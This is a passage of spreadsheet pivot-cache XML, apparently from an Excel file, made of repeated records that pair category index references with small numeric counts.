    <n v="25"/>
    <x v="983"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="983"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="984"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="984"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="984"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="984"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="984"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="984"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="984"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="984"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="985"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="985"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="19"/>
    <x v="985"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="13"/>
    <x v="985"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="985"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="34"/>
    <x v="985"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="5"/>
    <x v="985"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="985"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="986"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="986"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="986"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="986"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="986"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="986"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="987"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="987"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="987"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="987"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="987"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="987"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="987"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="987"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="988"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="988"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="988"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="988"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="988"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="988"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="988"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="971"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="2"/>
    <x v="989"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="2"/>
    <x v="989"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="15"/>
    <x v="989"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="14"/>
    <x v="989"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="989"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="989"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="989"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="8"/>
    <x v="989"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="989"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="989"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="989"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="989"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="989"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="989"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="990"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="990"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="990"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="990"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="990"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="990"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="7"/>
    <x v="990"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="990"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="954"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="954"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="954"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="954"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="954"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="954"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="954"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="991"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="991"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="991"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="991"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="991"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="991"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="991"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="992"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="992"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="992"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="993"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="993"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="993"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="993"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="993"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="993"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="993"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="993"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="993"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="993"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="994"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="994"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="994"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="994"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="994"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="994"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="994"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="994"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="994"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="995"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="995"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="995"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="995"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="995"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="996"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="996"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="996"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="996"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="10"/>
    <x v="996"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="4"/>
    <x v="996"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="996"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="996"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="997"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="997"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="997"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="997"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="997"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="998"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="998"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="15"/>
    <x v="998"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="998"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="998"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="998"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="999"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="999"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="999"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="999"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="999"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="999"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="999"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="999"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1000"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1001"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1002"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="3"/>
    <x v="968"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="968"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="968"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="968"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1003"/>
  </r>
  <r>
    <x v="0"/>
